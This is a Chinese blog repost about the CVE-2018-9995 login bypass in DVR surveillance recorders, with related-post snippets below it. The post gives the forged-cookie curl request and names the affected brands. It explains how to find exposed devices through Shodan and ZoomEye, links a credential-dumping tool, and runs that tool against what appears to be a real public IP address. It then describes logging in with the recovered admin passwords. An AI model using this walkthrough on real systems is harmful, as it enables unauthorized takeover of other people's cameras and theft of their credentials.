cve-2018-9995 dvr登录绕过漏洞

最新推荐文章于 2024-05-14 11:00:23 发布
最新推荐文章于 2024-05-14 11:00:23 发布
阅读量315 收藏 2
点赞数 1
文章标签: python 操作系统
原文链接:http://blog.51cto.com/superwolf/2124467
版权

本帖最后由 Snow狼 于 2018-6-4 10:27 编辑

dvr登录绕过漏洞
此漏洞允许×××者构造一个cookie即可登录
漏洞语句:curl "http://<dvr_host>:<port>/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"
测试有此漏洞的dvr:
Novo
CeNovo
QSee
Pulnix
XVR 5 in 1 (title: "XVR Login")
Securus, - Security. Never Compromise !! -
Night OWL
DVR Login
HVR Login
MVDR Login
用shodan查询:
cve-2018-9995 dvr登录绕过漏洞

用zoomeye查询:

cve-2018-9995 dvr登录绕过漏洞
工具链接:https://pan.baidu.com/s/1X96sJRIwHZcnoBOcWq2CpQ密码:dcoc
依旧是我们的linux基础命令:
unzip 解压
cd 到文件目录
pip install -r requirements.txt
注意:getDvr为启动脚本下图的红框框
cve-2018-9995 dvr登录绕过漏洞
python2.7 getDVR_Credentials.py --host (ip地址) 59.152.178.44 --port (端口) 9000
cve-2018-9995 dvr登录绕过漏洞
看红圆圈即是爆出来的密码然后访问那个IP地址填写用户名和密码就可以登入了
cve-2018-9995 dvr登录绕过漏洞
cve-2018-9995 dvr登录绕过漏洞
这就基本显示出来了晒几张成果图
cve-2018-9995 dvr登录绕过漏洞
cve-2018-9995 dvr登录绕过漏洞

转载于:https://blog.51cto.com/superwolf/2124467

weixin_34311757
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
DVR登录绕过漏洞复现(CVE-2018-9995)
LKmnbZ's Blog
01-12 1220
1. 基本概念 POC proof ofConcept 观点证明 证明漏洞是存在的 一般对目标没有伤害的 EXP exploit 漏洞利用 具备了对目标造成伤害的能力 一般以获取远端的控制权为主要标志 VUL vulnerability 泛指漏洞 CVE Common Vulnerabilities & Exposures 公共漏洞和暴露 0DAY Zero-daye...
java虚拟机绕过,DVR登录绕过漏洞(CVE-2018-9995)
weixin_31302909的博客
03-16 429
###漏洞描述此漏洞允许攻击者通过修改“Cookie: uid=admin” 之后访问特定 DVR 的控制面板,返回此设备的明文管理员凭证。###漏洞利用1.利用代码curl "http://:/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin"2.poc利用https://github.com/ezelf/CVE-2018-9995_...
DVR登录绕过漏洞(CVE-2018-9995)
weixin_30335575的博客
05-09 524
###漏洞描述 此漏洞允许攻击者通过修改“Cookie: uid=admin” 之后访问特定 DVR 的控制面板,返回此设备的明文管理员凭证。 ###漏洞利用 1.利用代码 curl "http://:/device.rsp?opt=user&cmd=list" -H "Cookie: uid=admin" 2.poc利用 https://github.com/ez...
h264_dvr_rce:TVT DVR上的远程代码执行漏洞
05-14
h264_dvr_rce 博客文章-http:
CVE-2018-9995--攻击网络硬盘录像机(DVR
mouseleoz的博客
05-05 3601
漏洞编号:CVE-2018-9995发现时间:2018-4影响范围:tbk、NovoCeNova、QSee、Pulnix、XVR 5 in 1、Securus、Night OWL漏洞描述:   DVR,全称为Digital Video Recorder(硬盘录像机),即数字视频录像机,相对于传统的模拟摄像录像机,采用硬盘录像,故常常被称为硬盘录像机,也被称为DVR。它是一套进行图像计算存储处理的计...
DVR登录绕过漏洞_CVE-2018-9995漏洞复现
WY92139010的博客
06-30 1225
DVR登录绕过漏洞_CVE-2018-9995漏洞复现 一、漏洞描述 此漏洞允许攻击者通过修改”Cookie:uid=admin”之后访问特定DVR的控制面板,返回此设备的明文管理员凭证。 二、影响软件以及版本 Novo CeNova QSee Pulnix XVR 5 in 1 (title: "XVR Login") Securus, - Security. Nev...
D-Link DSL-2888A 远程命令执行漏洞CVE-2020-24581/24579)
yy
03-09 4518
漏洞详情 D-Link DSL-2888A AU_2.31_V1.1.47ae55之前版本存在和远程命令执行漏洞,该漏洞源于包含一个execute cmd.cgi特性(不能通过web用户界面访问),该特性允许经过身份验证的用户执行操作系统命令。在该版本固件中同时存在着一个不安全认证漏洞CVE-2020-24580),在登录界面输入任意密码就可以成功访问路由器界面。通过组合这两个漏洞可以实现未授权的任意代码执行。 漏洞影响 AU_2.31_V1.1.47ae55之前版本 EG_1.00b4 漏.
CVE-2018-9995_dvr_credentials.rar_CVE-2018_FXG_burp CVE-2018-999
09-20
[Tool] show DVR Credentiales 通过CVE-2018-9995漏洞获取部分暴露于网络的监控设备权限,与Shodan配合食用更佳。
OPENSSH漏洞(CVE-2020-15778 CVE-2018-15473、CVE-2018-15919)修补文件命令
03-31
通过升级openssh到OpenSSH8.4 修复openssh低版本的漏洞 openssh8.4需要的 openssl-1.1.1g, openssh-8.4p1,zlib-1.2.11
CVE-2018-18778.docx
07-23
CVE-2018-18778 ,mini_httpd任意文件读取漏洞
OpenSSH 用户名枚举漏洞CVE-2018-15473).zip
03-06
OpenSSH 7.7及之前版本中存在用户枚举漏洞,该漏洞源于程序会对有效的和无效的用户身份验证请求发出不同的响应。 学习笔记
CVE-2018-9995漏洞复现
qq_39627497的博客
12-06 2924
DVR,全称为Digital Video Recorder(硬盘录像机),即数字视频录像机,相对于传统的模拟摄像录像机,采用硬盘录像,故常常被称为硬盘录像机,也被称为DVR。它是一套进行图像计算存储处理的计算机系统,具有对图像/语音和动态帧等进行长时间录像、录音、远程监视和控制的功能,DVR集合了录像机、画面分割器、云台镜头控制、报警控制、网络传输等五种功能于一身,用一台设备就能取代模拟监控系统一...
CVE-2019-9995复现并改写exp
Seizerz的博客
09-06 728
一、漏洞介绍 DVR,全称为Digital Video Recorder(硬盘录像机),即数字视频录像机,相对于传统的模拟摄像录像机,采用硬盘录像,故常常被称为硬盘录像机,也被称为DVR。它是一套进行图像计算存储处理的计算机系统,具有对图像/语音和动态帧等进行长时间录像、录音、远程监视和控制的功能,DVR集合了录像机、画面分割器、云台镜头控制、报警控制、网络传输等五种功能于一身,用一台设备就能取...
CVE-2018-9995摄像头
haha1314的博客
07-15 1382
一、漏洞介绍 DVR,全称为Digital Video Recorder(硬盘录像机),即数字视频录像机。最初由阿根廷研究员发现,通过使用“Cookie: uid = admin”的Cookie标头来访问特定DVR的控制面板,DVR将以明文形式响应设备的管理员凭证。 二、复现过程 1、搜索引擎搜索使用DVR设备的网站或服务器 Shodan/zoomeye: “GNU rsp/1.0” 或 ...
黑客正在利用 TBK DVR 设备中五年未修复的 0day
smellycat000的专栏
05-04 672
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士FortiGuard Labs 发布安全公告指出,威胁行动者们正在利用影响 TBK 数字化视频记录 (DVR) 设备的一个未修复漏洞 (CVE-2018-9995)。该漏洞已存在五年之久。CVE-2018-9995的CVSS 评分为9.8,是一个认证绕过漏洞,可被远程攻击者用于提升权限。Fortinet 在5月1日发布的文章中剃刀,“该已存在五年...
CamRaptor:针对DVR摄像头的漏洞利用工具
weixin_43977912的博客
10-09 898
关于CamRaptor CamRaptor是一款针对DVR摄像头的漏洞利用工具,它可以利用当前主流DVR摄像头中的多个安全漏洞,帮助广大研究人员获取目标DVR网络摄像头的管理员凭证。 功能介绍 能够利用当前主流DVR摄像头中的多个安全漏洞,例如Novo、CeNova和QSee等。 经过优化处理,支持以多线程的形式同时攻击列表中的多个目标DVR摄像头。 简单的命令行接口和API使用方法。 工具安装 由于CamRaptor使用Python3开发,因此首先需要在本地设备上安装并配置好Python3环境。接下来,广
PythonPython中变量或者函数加下划线‘_‘的含义
最新发布
yangweipeng708的博客
05-14 676
理解这些约定可以帮助Python开发者编写更清晰、更Pythonic的代码,并理解其他Python代码中的命名习惯。)通常用来指示特定的编程约定或用法,这些约定主要关乎变量和函数的可访问性以及预期的使用范围。在Python中,变量或函数前面加一个下划线(
cve-2018-15473的漏洞验证脚本
07-27
以下是一个用于验证CVE-2018-15473漏洞的简单脚本示例: ```python import paramiko def check_vulnerability(host, port, username, password): try: client = paramiko.SSHClient() client.set_missing_host_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值